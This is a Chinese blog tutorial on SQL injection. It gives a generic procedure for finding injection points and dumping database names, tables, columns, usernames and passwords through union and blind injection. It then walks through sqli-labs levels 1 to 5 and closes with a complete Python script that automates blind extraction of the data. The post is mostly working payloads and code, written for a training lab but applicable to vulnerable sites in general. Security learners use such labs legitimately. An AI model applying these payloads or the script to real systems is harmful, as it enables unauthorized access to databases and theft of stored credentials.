导航
导航
文章目录
  1. 解锁SQL注入技能(1)
    1. nullSQL注入基本流程
    2. null开始CXK式操作

解锁SQL注入技能1

2019.08.06 13m0nade web安全  热度

解锁SQL注入技能(1)

nullSQL注入基本流程

1)首先测试正常数据,如?id=1

2)判断是否存在注入点,如在?id=1+【‘】、【and 1=1】或【and 1=2】

3)判断字段长度,列数如在?id=1+【‘】+【 order by 1 (数字任意)】,id=1‘ order by 1=1 # ,id=1’ order by 1=2 #

4)判断字段回显位置,如在?id=1+【‘】+【union select 1,2,3,4,5,6,7,8,9,10,11#】

5)判断数据库信息
利用内置函数暴数据库信息
version()版本;database()数据库;user()用户;
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user
数据库权限:
and ord(mid(user(),1,1))=114返回正常说明为root

6)查找数据库名
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息union select information_schema from information_schema.schemata (语句在显示位)

7)查找数据库表名
union select group_concat(table_name) from information_schema.tables where table_schema=database()

8)查找列名
union select group_concat(column_name) from information_schema.columns where table_name=‘users’ --+

9)获取值
union select group_concat(username,password) from users–+
或者1’ union select 1,(select 列名 from 表名),3,4#

10)查找数据库表中所有字段以及字段值
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1

判断是否存在注入点
?id=100’ 返回错误说明有可能注入
?id=100 and 1=1 返回正常
?id=100 and 1=2返回错误

null开始CXK式操作

平台:sqli-labs

工具:firefox,hackbar

LV1

根据名字可知,第一关为基于报错的单引号字符型注入(后续将给出判断过程)。

  1. 在url后输入?id=1页面回显正常,然后加上‘,页面出现报错“You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1",是单引号型注入,使用–+注释后页面回显正常。
  2. 使用order by判断字段长度,order by 4时出现报错,3时回显正常,所以字段长度为3.
  3. 使用?id=0’union select 1,2,group_concat(schema_name) from information_schema.schemata --+来查找数据库名(id要为不存在的字段,好让第一句结果为空,直接显示第二句的结果)
  4. 使用?id=0’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= ‘security’–+查询数据库表名
  5. id=0’union select 1,2,group_concat(column_name) from information_schema.columns where table_name= ‘users’–+查询数据库列名
  6. 使用?id=0’ union select 1 , group_concat(username) ,group_concat(password)from security.users–+爆出username和password

LV2

  1. 在url后输入?id=1页面回显正常,然后加上‘,页面出现报错“You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right
    syntax to use near ‘’ LIMIT 0,1’ at line 1”可以得到这个sql语句其实并没有单引号,只是用数字进行查询。(或者输入?id=2-1,结果与?id=1相同)
  2. 继续第一关操作,单引号去掉,也不用注释,其它保持不变就行。payload:id=0 union select 1 , group_concat(username) ,group_concat(password)from security.users

LV3

  1. 在url后输入?id=1页面回显正常,然后加上‘,页面出现报错“You have an error in your SQL syntax check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1”,加上)–+后显示正常。
  2. 继续1的操作,只要在引号后加上)即可。 ?id=0’) union select 1 , group_concat(username) ,group_concat(password)from security.users–+

LV4

在url后输入?id=1页面回显正常,然后加上‘,页面未报错,输入”页面出现报错“You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘“1"”) LIMIT 0,1’ at line 1“,加上)–+后显示正常。

继续1的操作,只要在双引号后加上)即可。 ?id=0") union select 1 , group_concat(username) ,group_concat(password)from security.users–+

LV5

  1. 输入?id=1显示显示You are in…,输入‘出现报错“You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for theright syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1 ”,注释后显示You are in…。
  2. 尝试之前的注入方法,会发现不再会返回我们注入的信息,如果注入成功的话,页面会返回You are in…,出错的话就不会返回这个字符串,所以这里我们可以进行盲注。
  3. ?id=1’ and left(version(),1)=5 %23 查看版本信息
  4. ?id=1’ and length(database())= 8 %23 判断数据库长度
  5. 猜测数据库名称(从第一位开始猜):
    1>猜第1位
    ?id=1’ and left(database(),1)>‘a’ %23
    返回正常
    ?id=1’ and left(database(),1)>‘z’ %23
    返回错误
    说明第一位在a和z之间
    ?id=1’ and left(database(),1)>‘s’ %23
    返回正确
    所以第一位是s
    1>猜第2位
    ?id=1’ and left(database(),2)>‘sa’ %23
    返回正常
    ?id=1’ and left(database(),2)>‘sz’ %23
    返回错误
    说明第二位在a和z之间
    ?id=1’ and left(database(),2)>‘se’ %23
    返回正确
    所以第二位是e
    以此类推,直到推出第8位:最后数据库为security
  6. 猜测数据库(security)中的表:
    ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1)b,1))>n
    说明:
    a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
  7. 猜用户:
    ?id=1’and ord(mid((select ifnull(cast(username as char),0x20)from S. M order by id limit A,1),B,1))=N %23
    其中S 为数据库名;M为表名;A为第几个用户;B为第几个字符;N为ASCII码所对应的十进制数。
  8. 猜用户和密码:
    ?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from S.Morder by id limit A,1),B,1))=N %23
    其中S 为数据库名;M为表名;A为第几个用户;B为第几个字符;N为ASCII码所对应的十进制数。
    例:?id=1’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68 %23

可直接使用python脚本,具体代码如下(python3)

1
import requestsurl = 'http://127.0.0.1/sqlilabs/Less-5/?id=1'db_length = 0db_name = ''table_num = 0table_len = 0table_name = ''table_list = []column_num = 0column_len = 0column_name = ''column_list = []dump_num = 0dump_len = 0dump_name = ''dump_list = []i = j = k = 0### 当前数据库名长度 ###for i in range(1,20):    db_payload = '''' and (length(database())=%d)--+''' %i    # print(url+db_payload)    r = requests.get(url+db_payload)    if "You are in" in r.text:        db_length = i        print('当前数据库名长度为:%d' % db_length)        break### 当前数据库名 ###print('开始猜解数据库名......')for i in range(1,db_length+1):    for j in range(95,123):        db_payload = '''' and (left(database(),%d)='%s')--+''' % (i,db_name+chr(j))        r = requests.get(url+db_payload)        if "You are in" in r.text:            db_name += chr(j)            # print(db_name)            breakprint('数据库名:\n[+]',db_name)### 当前数据库表的数目 ###for i in range(100):    db_payload = '''' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+''' % (i,db_name)    r = requests.get(url+db_payload)    # print(url+db_payload)    if "You are in" in r.text:        table_num = i        breakprint('一共有%d张表' % table_num)print('开始猜解表名......')### 每张表的表名长度及表名 ###for i in range(table_num):    table_len = 0    table_name = ''    #### 表名长度 ####    for j in range(1,21):        db_payload = '''' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit %d,1),%d,1))--+''' % (i,j)        r = requests.get(url+db_payload)        # print(db_payload)        if "You are in" not in r.text:            table_len = j-1            #### 猜解表名 ####            for k in range(1,table_len+1):                for l in range(95,123):                    db_payload = '''' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d--+''' % (i,k,l)                    # print(db_payload)                    r = requests.get(url+db_payload)                    # print(db_payload)                    if "You are in" in r.text:                        table_name += chr(l)            print(table_name)            table_list.append(table_name)            breakprint('表名:',table_list)### 每个表的列的数目、列名及列名长度 ###for i in table_list:    #### 每个表的列的数目 ####    for j in range(100):        db_payload = '''' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+''' % (        j, i)        r = requests.get(url + db_payload)        if "You are in" in r.text:            column_num = j            print(("[+] 表名:%-10s\t" % i) + str(column_num) + '字段')            break#### 猜解列名长度 ####column_num = 3print('%s表中的列名:' % table_list[-1])for j in range(3):    column_name = ''    for k in range(1,21):        db_payload = '''' and ascii(substr((select column_name from information_schema.columns where table_name="%s" limit %d,1),%d,1))--+''' % (table_list[-1],j,k)        r = requests.get(url+db_payload)        if "You are in" not in r.text:            column_len = k-1            # print(column_len)            break        #### 猜解列名 ####        for l in range(95,123):            db_payload = '''' and ascii(substr((select column_name from information_schema.columns where table_name="%s" limit %d,1),%d,1))=%d--+''' % (table_list[-1],j,k,l)            r = requests.get(url + db_payload)            if "You are in" in r.text:                column_name += chr(l)    print('[+] ',column_name)    column_list.append(column_name)print('开始爆破以下字段:',column_list[1:])for column in column_list[1:]:    print(column,':')    dump_num = 0    for i in range(30):        db_payload = '''' and %d=(select count(%s) from %s.%s)--+''' % (i,column,db_name,table_list[-1])        # print(db_payload)        r = requests.get(url+db_payload)        if "You are in" in r.text:            dump_num = i            # print(i)            break    for i in range(dump_num):        dump_len = 0        dump_name = ''        #### 字段长度 ####        for j in range(1, 21):            db_payload = '''' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+''' % (column,db_name,table_list[-1],i,j)            r = requests.get(url + db_payload)            if "You are in" not in r.text:                dump_len = j-1                for k in range(1, dump_len + 1):                    for l in range(1,256):                        db_payload = '''' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))=%d--+''' % (column,db_name,table_list[-1],i,k,l)                        # print(db_payload)                        r = requests.get(url+db_payload)                        if "You are in" in r.text:                            dump_name += chr(l)                            # print(dump_name)                            break                break        print('[+]',dump_name)

因篇幅过长下次更新。。。

敬请关注:-)

支持一下
扫一扫,支持13m0nade
  • 走过路过不要错过~